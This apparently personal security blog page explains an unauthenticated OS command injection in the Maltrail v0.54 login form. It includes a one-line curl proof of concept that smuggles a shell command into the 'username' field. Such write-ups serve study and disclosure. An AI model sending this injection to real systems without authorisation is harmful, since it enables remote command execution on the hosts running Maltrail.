๐Ÿ’€
Samfisher blog
  • Common Vulnerabilities and Exposures
    • ๐ŸงบCVE-2023-27163
    • ๐Ÿ›ค๏ธMaltrail - OS Command Injection
  • ๐Ÿ‘พCrafty - HTB
  • ๐ŸŒŒSkyfall - HTB
  • ๐Ÿ”ขRegistryTwo - HTB
  • โฌ‡๏ธDownload - HTB
  • โ˜ ๏ธCybermonday - HTB
  • ๐Ÿ€Rebound - HTB
  • ๐Ÿ‘จโ€๐Ÿ’ผOffice - HTB
  • Wave - FlagYard
  • Blackhat - Saudi <Web> iFrame
Powered by GitBook
On this page
  1. Common Vulnerabilities and Exposures

Maltrail - OS Command Injection

PreviousCVE-2023-27163NextCrafty - HTB

Last updated 1 year ago

Application Description

Maltrail is a malicious traffic detection system ,read more about it HERE

Vulnerability Description

On February 24th, 2023, a researcher discovered and reported a vulnerability in Maltrail v0.54. This vulnerability exposes the system to unauthenticated OS command injection during the login process.

POC

Maltrail main web page

The vulnerability exists in the 'username' parameter, which is susceptible to blind OS command injection.

curl 'http://hostname:8338/login' \
  --data 'username=;`id > /tmp/test`'

Resources

๐Ÿ›ค๏ธ
  • Application Description
  • Vulnerability Description
  • POC
LogoUnauthenticated OS Command Injection in stamparm/maltrail-...Vulners Database